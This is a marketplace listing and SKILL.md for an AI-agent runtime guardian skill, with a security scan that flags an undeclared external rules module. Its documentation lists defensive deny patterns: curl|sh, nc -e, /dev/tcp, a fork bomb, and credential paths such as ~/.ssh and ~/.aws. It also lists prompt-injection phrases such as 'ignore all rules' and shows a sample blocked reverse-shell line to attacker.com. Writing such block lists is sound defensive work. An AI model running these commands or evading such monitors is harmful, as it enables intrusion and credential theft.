ClawGuard-Guardian

v3.0.0

ClawGuard Guardian v3 - Runtime guardian with behavior monitoring, interception, session freeze/replay, and emergency response

⭐ 0· 12·0 current·0 all-time

by@stardreaming

MIT-0

Security Scan

VirusTotal

Benign

View report →

OpenClaw

Suspicious

medium confidence

Purpose & Capability

Name/description claim a runtime guardian (monitoring, interception, freeze/replay). The included code implements session tracking, logging, replay, freeze/unfreeze and blocking logic, which is broadly consistent. However the core rules are required via require('../../shared/rules/interceptor-rules.js')—a file outside the package that is not included or declared. That external dependency is unexplained and necessary for decision logic, creating an incoherence between claimed self-contained capability and actual runtime requirements.

Instruction Scope

SKILL.md instructs monitoring of commands, files, network, and prompt injections and describes blocking/confirm behaviors for sensitive paths (e.g., /etc, /.aws). The packaged code reads/writes logs under ~/.clawguard and provides replay/freeze operations, but there is no clear code that hooks into an agent runtime to intercept ALL agent actions or network calls. The instructions imply agent-level interception and broad filesystem awareness; the implementation as shipped does not include the external rule module or other integration modules referenced in README (Detect, Shield, Auditor), so the runtime scope is ambiguous and possibly incomplete.

ℹ

Install Mechanism

There is no install spec and package.json has no dependencies; code is included in the bundle and will run locally with node. This avoids remote downloads (lower install risk). However, because code expects an external shared rules module outside the package, proper operation may depend on platform-provided files—this is an installation/integration dependency that is not declared.

ℹ

Credentials

The skill does not request environment variables, binaries, or credentials. It persistently reads/writes logs under the user's home (~/.clawguard/logs/) and may read those logs and other files when replaying sessions. The SKILL.md and code reference monitoring reads of system paths (e.g., /etc) in rules/examples; although these are for blocking/monitoring, the skill's access to home and potential to reference system paths is notable and should be considered before installing on systems with sensitive files.

ℹ

Persistence & Privilege

always:false (normal). The skill will create/read persistent logs in ~/.clawguard and maintains session state on disk. It does not declare modifications to other skills or system-wide agent settings. Autonomous invocation is allowed (platform default) — combine this with the other concerns (external rule dependency and broad monitoring instructions) when deciding risk.

What to consider before installing

This package mostly looks like a legitimate local 'guardian' tool but there are important inconsistencies you should resolve before installing or enabling it: - Missing external rules: The code requires '../../shared/rules/interceptor-rules.js' which is not included. Ask the author where that file comes from (platform-provided, separate package, or omitted). Running the skill without that module may produce unexpected behavior or silently fall back to insecure defaults. - Verify integration surface: SKILL.md implies agent-level interception of commands, files, and network activity, but the shipped code appears to be a standalone CLI that reads/writes ~/.clawguard logs. Confirm how this skill is intended to hook into your agent runtime and whether additional platform components (Detect/Shield/Auditor) are required. - Inspect omitted implementations: The audit logger and referenced modules (Detect/Shield/etc.) are not present in the package excerpt. Request full source or a signed release, and review any code that handles I/O, network, or dynamic requires before running. - Run in isolation: If you test it, run it in an isolated environment (non-production account/machine) and monitor filesystem and network activity (e.g., with auditd or network monitoring) to ensure it does not exfiltrate data. - Least privilege and logs: Expect it to create persistent logs in ~/.clawguard; if that is unacceptable for your environment, do not install. If you need this functionality, prefer a version that bundles all dependencies or points to a verified, auditable rules module and a public source/homepage. If the author can provide the missing rules module and clarify how the skill integrates with the agent (and show there are no hidden remote endpoints), the assessment could move toward benign. Right now, the unexplained external dependency and mismatch between instructions and shipped code justify caution.

Like a lobster shell, security has layers — review code before you run it.

latestvk979n9cfpj9macxv072hxm701n846s38

License

MIT-0

Free to use, modify, and redistribute. No attribution required.

Termshttps://spdx.org/licenses/MIT-0.html

SKILL.md

🛡️ ClawGuard Guardian (CG-GD) v3

Runtime guardian for monitoring, intercepting, and controlling AI agent operations. Provides real-time behavior monitoring, risk-based interception, session replay, and emergency freeze capabilities.

When to Use

Activate ClawGuard Guardian when:

A user asks to start guardian or monitoring
User asks to view status or logs
User asks to replay or freeze sessions
Emergency response is needed
User asks "start monitoring" or "show status"

How to Execute

Command 1: Start Monitoring

User: Start guardian
Agent:
🛡️ Guardian starting...
   Session ID: session-xxx
   Status: ACTIVE
   Monitoring: Commands, Files, Network, Prompt Injections

Command 2: View Status

User: Show status
Agent:
╔═══════════════════════════════════════════════════════════════╗
║                 🛡️ Guardian Status                      ║
╠═══════════════════════════════════════════════════════════════╣
║  Current Status: 🟢 ACTIVE                              ║
║  Session ID: session-xxx                               ║
║  Operations: XXX                                       ║
║  Blocked: X                                            ║
║  Frozen Sessions: X                                    ║
╚═══════════════════════════════════════════════════════════════╝

Command 3: Freeze Session

User: Freeze session
Agent:
🛡️ Session frozen: session-xxx
   Time: YYYY-MM-DD HH:MM:SS
   Pending ops: X

   Type "unfreeze" to resume.

Command 4: Replay Session

User: Replay session
Agent:
📺 Session Replay:
   ✅ [10:30:01] Command: ls -la
   ✅ [10:30:05] File: Read /tmp/test.txt
   🚫 [10:30:10] File: /etc/passwd (BLOCKED)
   ✅ [10:30:15] Network: api.github.com

Command 5: View Logs

User: Show logs
Agent:
📜 Recent Logs (50 lines):
   🟢 [10:30:01] ls -la /workspace
   🟢 [10:30:05] Read /tmp/test.txt
   🚫 [10:30:10] Try Read /etc/passwd (BLOCKED)

Monitoring Capabilities

Type 1: Command Monitoring

Guardian monitors executed commands:

Pattern	Risk	Action
`rm -rf /home`	🔴 CRITICAL	BLOCK
`curl\|sh`	🔴 CRITICAL	BLOCK
`nc -e`	🔴 CRITICAL	BLOCK
`sudo su`	🟠 HIGH	WARN
`rm -rf`	🟠 HIGH	CONFIRM
`chmod 777`	🟠 HIGH	CONFIRM

Type 2: File Operation Monitoring

Pattern	Risk	Action
`/.ssh/`	🔴 CRITICAL	BLOCK
`/.aws/`	🔴 CRITICAL	BLOCK
`/.kube/`	🔴 CRITICAL	BLOCK
`/etc/`	🟠 HIGH	CONFIRM
`/root/`	🔴 CRITICAL	BLOCK
`/.env`	🟠 HIGH	WARN

Type 3: Network Monitoring

Pattern	Risk	Action
`.onion`	🔴 CRITICAL	BLOCK
`evil.com`	🔴 CRITICAL	BLOCK
Unknown domains	🟡 MEDIUM	LOG
External API	🟡 MEDIUM	LOG

Type 4: Prompt Injection Monitoring

Pattern	Risk	Action
`DAN` jailbreak	🔴 CRITICAL	BLOCK
`ignore all rules`	🟠 HIGH	WARN
Zero-width chars	🟠 HIGH	STRIP
Role hijacking	🟡 MEDIUM	LOG

Interception Rules

Path Rules

const PATH_RULES = {
  // Absolute deny
  DENY: [
    '/etc/passwd',
    '/etc/shadow',
    '/etc/sudoers',
    '/etc/cron.d',
    '/root/.*',
    '/.ssh/.*',
    '/.aws/.*',
    '/.kube/.*',
    '/.docker/.*'
  ],

  // Confirm required
  CONFIRM: [
    '/etc/',
    '/var/',
    '/usr/local/'
  ],

  // Allowed (whitelist)
  ALLOW: [
    '/tmp/.*',
    '/workspace/.*',
    '~/projects/.*'
  ]
};

Command Rules

const COMMAND_RULES = {
  // Absolute deny
  DENY: [
    'rm -rf /',
    'rm -rf /home',
    'rm -rf /root',
    ':(){ :|:& };:',  // Fork bomb
    'dd if=.*of=/dev/',
    'mkfs',
    'fdisk',
    'curl.*\\|.*sh',
    'wget.*\\|.*sh',
    'nc -e',
    '/dev/tcp/'
  ],

  // Confirm required
  CONFIRM: [
    'rm -rf',
    'chmod 777',
    'chmod +x',
    'killall',
    'pkill',
    'shutdown',
    'reboot'
  ]
};

Network Rules

const NETWORK_RULES = {
  // Deny hosts
  DENY_HOSTS: [
    '*.onion',
    '*.i2p',
    'evil.com',
    'attacker.com',
    'malicious.com'
  ],

  // Confirm ports
  CONFIRM_PORTS: [22, 23, 25, 3306, 5432, 6379, 27017],

  // Max upload size
  MAX_UPLOAD_SIZE: 10 * 1024 * 1024  // 10MB
};

Session Management

Session States

State	Description	Actions Available
`ACTIVE`	Currently running	Monitor, Block, Freeze
`FROZEN`	Paused	Unfreeze, Replay, Export
`COMPLETED`	Finished	Replay, Export
`TERMINATED`	Emergency stop	Archive

Freeze Actions

When a session is frozen:

All pending operations are paused
No new operations can start
Evidence is preserved
User is notified

🛡️ SESSION FROZEN
────────────────────────────────────────
Session ID: session-xxx
Frozen at: YYYY-MM-DD HH:MM:SS
Operations pending: X
Last operation: Read /etc/passwd

Type "unfreeze session-xxx" to resume.

Unfreeze Actions

User: Unfreeze session-xxx
Agent:
✅ Session unfrozen: session-xxx
   Resumed at: YYYY-MM-DD HH:MM:SS
   Pending operations: X

Audit Logging

Log Format

{
  "timestamp": "YYYY-MM-DDTHH:mm:ss.sssZ",
  "sessionId": "session-xxx",
  "type": "operation|block|freeze|unfreeze",
  "action": "command|file|network",
  "target": "/path/to/resource",
  "result": "SUCCESS|BLOCKED|FROZEN",
  "riskLevel": "INFO|WARNING|HIGH|CRITICAL",
  "details": {}
}

Log Storage

Location: ~/.clawguard/logs/
Format: audit-YYYY-MM-DD.jsonl
Rotation: 100MB per file, 10 files max
Retention: 30 days

Response Actions

Risk-Based Responses

Risk Level	Icon	Response	Guardian Action
INFO	🟢	Allow	Log only
WARNING	🟡	Allow + Warn	Log + Alert
HIGH	🟠	Confirm	Ask user
CRITICAL	🔴	Block	Auto-block + Alert

Automated Responses

Detection	Guardian Response
SSH key access	Block + Freeze
Reverse shell	Kill + Block + Alert
Data exfiltration	Block + Freeze + Preserve
Fork bomb	Block immediately
Mass file delete	Block + Confirm

Session Replay

Replay Format

📺 Session Replay: session-xxx
────────────────────────────────────────
Start: YYYY-MM-DD HH:MM:SS
Duration: XX minutes
Operations: XX

Timeline:
🟢 [10:30:01] Command: ls -la /workspace
🟢 [10:30:05] Read: /tmp/data.json
🟢 [10:30:10] Write: /workspace/output.txt
🟢 [10:30:15] Network: GET api.github.com
🟡 [10:30:20] Read: /var/log/syslog (WARNING)
🚫 [10:30:25] Write: /etc/cron.d/malware (BLOCKED)
🟢 [10:30:30] Command: git status

────────────────────────────────────────
Blocked: 1 | Warnings: 1 | Allowed: 6

Export Options

# Export as JSON
session export session-xxx --format json

# Export as report
session export session-xxx --format report

# Export evidence
session export session-xxx --evidence

Quick Commands Reference

Command	Description
`start`	Start Guardian monitoring
`status`	Show current status
`freeze [id]`	Freeze session
`unfreeze [id]`	Unfreeze session
`replay [id]`	Replay session
`logs [lines]`	Show recent logs
`export [id]`	Export session

Guardian Integration

With Auditor

[Skill Installation]
         │
         ▼
┌─────────────────┐
│  ClawGuard      │
│  Auditor        │
│  (Pre-flight)   │
└────────┬────────┘
         │ APPROVED
         ▼
┌─────────────────┐
│  ClawGuard      │◄──────── Guardian monitors
│  Guardian       │          ongoing operations
│  (Runtime)     │
└────────┬────────┘
         │
         ▼
    [Safe Operation]

With Detect

[Threat Detected]
         │
         ▼
┌─────────────────┐
│  ClawGuard      │
│  Detect         │
└────────┬────────┘
         │ CRITICAL
         ▼
┌─────────────────┐
│  ClawGuard      │
│  Guardian       │
│  (Auto-freeze)  │
└─────────────────┘

Output Format Examples

Status Output

╔═══════════════════════════════════════════════════════════════╗
║                 🛡️ Guardian Status                      ║
╠═══════════════════════════════════════════════════════════════╣
║  Status:        🟢 ACTIVE                             ║
║  Session ID:    session-xxx                             ║
║  Start Time:   YYYY-MM-DD HH:MM:SS                     ║
╠═══════════════════════════════════════════════════════════════╣
║  Operations:   128                                   ║
║  Blocked:       3                                     ║
║  Warnings:      12                                    ║
║  Frozen:        0                                    ║
╠═══════════════════════════════════════════════════════════════╣
║  Monitoring:    Commands ✓ Files ✓ Network ✓ Injections  ║
╚═══════════════════════════════════════════════════════════════╝

Freeze Confirmation

╔═══════════════════════════════════════════════════════════════╗
║  🛡️ SESSION FROZEN                                      ║
╠═══════════════════════════════════════════════════════════════╣
║  Session: session-xxx                                   ║
║  Frozen: YYYY-MM-DD HH:MM:SS                           ║
║  Reason: CRITICAL threat detected                       ║
║  Last Op: nc -e /bin/bash attacker.com 4444            ║
╠═══════════════════════════════════════════════════════════════╣
║  Pending: 3 operations                                 ║
║  Evidence: Preserved                                    ║
╚═══════════════════════════════════════════════════════════════╝

Type "unfreeze session-xxx" to resume.

v3 vs v2 Features

Feature	v2	v3
Command Monitoring	Basic	✅
File Monitoring	Basic	✅
Network Monitoring	Basic	✅
Session Freeze	❌	✅ (v3)
Session Replay	❌	✅ (v3)
Evidence Preservation	❌	✅ (v3)
Auto-freeze on Critical	❌	✅ (v3)
Rule Engine	❌	✅ (v3)
Audit Export	❌	✅ (v3)
Integration with Detect	❌	✅ (v3)

ClawGuard Guardian: Vigilant protection, real-time control. 🛡️

Files

6 total

Select a file

Select a file to preview.

Comments

Loading comments…